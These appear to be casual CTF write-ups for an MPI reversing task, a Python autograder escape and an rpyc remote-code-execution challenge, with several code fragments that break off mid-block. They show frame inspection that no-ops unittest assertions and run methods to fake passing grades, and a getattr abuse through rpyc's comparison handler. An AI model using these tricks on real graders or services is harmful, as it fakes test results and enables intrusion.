+everyones just burnt out from organizing sapling lmao so im just looking at easy challs myself too
+
+* * *
+
+ngl this one is just reading MPI docs lmao
+
+i didnt have mpirun set up, so i just ended up statically reversing the entire thing
+
+which wasnt that bad actually theres only really 3 functions in question:
+ - first reads the flag as root process, scramble it, and then scatters it to the rest of the processes via `MPI_scatter`
+ - on first glance i thought the second one was just an artifical delay of some sorts since all it does it basically just sending and recving then syncing up, but on closer look they are swapping between processes
+ - third one gathers back the flag and checks it against the string as root process, and does nothing as other processes
+
+so its just a matter of rewriting the program in python without all the interprocess communciation overheads then
+
+except i kept brainfarting and somehow thought `#!py print("".join(['m_ERpmfrNkekU4_4asI_Tra1e_4l_c4_GCDlryidS3{Ptsu9i}13Es4V73M4_ans'[s[i]] for i in range(64)]))` would give me the correctly inversed flag if `s` is the scrambled index lmao
+
+then i went on a rabbit hole figuring out where exactly i did the swapping wrong scrutinizing every single detail in the MPI docs and trying out like 4 different variations of my swapping from doing it in parallel to making a multidimensional array to ensure im not making arithmetic mistakes on the array indices
+
+and then i finally gave up and used z3 which instantly spewed out the flag :clown:
+eyo something familiar to me lets go?? ~~totally not something ive been doing to my own courses' autograders~~
+
+except this one highkey is easier than the hurdles prairielearn and the likes brings me through tho lmao
+
+we get arbitrary leaks just by returning the value (albeit truncated), and theres no restrictions on whatever imports we need
+
+so logically the first thing to do is to traverse the stack since apparently all of these autograders basically runs in the same process for some reason lol
+
+~~like interprocess communication and isolation between graders and runners wouldve been a much better design choice to prevent grade modifications but ok~~
+
+anyways it seems like most of the useful variables is in the second previous frame, so after a lot of `str(inspect.currentframe().f_back.f_back.f_globals.keys())[:64]`, `[64:128]`, `[128:192]`... to leak the data out by chunks to bypass the truncation i mentioned before i finally...
+
+got fed up with the inefficiency :upside_down:
+
+which funnily enough is also when i saw `_common_shorten_repr` which sounds suspiciously like its responsible for the truncation
+
+and so nooping it i go: `#!py inspect.currentframe().f_back.f_back.f_globals['_common_shorten_repr'] = lambda *str: str`
+
+originally i guessed `#!py lambda str: str`, but that ended up spewing arcane errors about format string having not enough parameters lmao so i just let made it vararg instead
+
+and ey i was correct now we can leak things much faster than having to stitch together chunks after multiple runs
+
+the next thing that caught my eyes is `TestCase` - this is just from the builtin `unittest` module aint it
+
+for it to be here it probably means they are using it to run the tests, so what if we just make all the assertions on it succeed
+
+and with the following code
+```py
+# TestCase is just python unittests, we can set assert* to True to pass all assertions
+except a lot of the other test cases are still complaining about wrong format lmao so just nooping the assertions arent enough we need to noop the entire test case
+
+after reading on how `TestCase` works for a bit i realized all test cases have to go through the `run` entrypoint
+
+so what if we just noop that instead
+
+turns out its slightly more complicated than just a `lambda res: None` lmao we need to get the actual test cases which subclasses `util.TestCase`, and also set the `TestResult` object to success
+even tried to nudge rpyc to send the code to remote with no avail lol
+```py
+class metatest(type):
+ def __add__(self, b):
+ import subprocess
+ breakpoint() #if its local i will see instantly on my current terminal - just for ease of local debugging since cwd is same for server and client and its hard to tell
+coz i thought what if they only accounted for normal usage of functions so cases like these would be tricked into calling the local versions of the objects instead of netrefs but no its not how it works
+
+so since it seems like normal use cases wont be able to trigger code execution on remote its time to dig deep into the src
+
+it turns out theres a netref class in `netref.py` that basically proxies all remote objects' functions back to remote through a few handlers in `protocol.py`
+
+which means all local references execute on local since on remote they just become a netref so they just bounce back to run the code on local (and vice versa too - all remote references will stay in remote land, but we cant really access remote references since getattr is locked down)
+
+since it seems like there aint much we can do with the netrefs themselves, i started digging deep into the protocol handlers, which all seemed pretty secure in the `DEFAULT_CONFIG` sense - until i found `HANDLE_CMP` which just called `#!py return getattr(type(obj), op)(obj, other)` for some reason
+
+so i started thinking if theres any attr we can leak that will help us leak more which *also* has the property of accepting 2 parameters - and it turns out `__getattr__` does exactly that
+
+except `__getattr__` actually just bounces everything back into local:
+BUT `__getattribute__` DOES get the local attributes specified in the `LOCAL_ATTRS` dict which includes most useful things like `__class__` and `__dict__`
+
+now we can finally leak remote references that are not netrefs out into our client, which once we have them should allow us to stay in remote land
+
+we still need to continue using this vulnerable `getattr` method instead of directly `obj.attr`ing which will use the secure `HANDLE_GETATTR` handler though, but the idea stays the same as most basic pyjails
+
+with that, we can get arbitrary code execution on remote, and the flag: `dice{pyj41l_w1th_4_tw15t}`
+
+```py
+import rpyc
+from rpyc.core import consts
+
+#the idea is that once you get a remote reference, you can stay in remote land since all calls will be directed back to remote
+#however getting that remote reference in the first place is quite annoying since most useful attributes are either blocked or local
+#and theres not really a way to differentiate between those unless you dive into rpyc src
+#also any local references (e.g. import os; os.system is a local reference that will end up running on our local machine; a local definition of a class with modified __add__ to trick remote to run will also not work since it will bounce back to local when we do conn.root.add())
+#will end up bouncing back to local so the entrypoint has to be conn.root since that's the only remote reference at start
+
+def remote_getattr(obj, name):
+ #abuses the fact that CMP is the only one that doesnt have a secure check but directly uses getattr
+ #also abuses the fact that __getattribute__ bypasses netref calls for certain local attrs so we dont bounce back to client
+also unrelated: wsl port forward messed with my local/remote debug setup apparently lmao
+
+and it seems like rpyc requires same (major?) version to run correctly? i was on 5.1.0 which just kept giving me connection closed by peer
+
+this bug apparently is patched in the version i had in my python installation so im just glad i got stuck connecting to remote and downgraded to 4.1.0 before digging into the src lmao
+
+or else i'd probably be malding over how theres no entrypoints for me to exploit at all kekw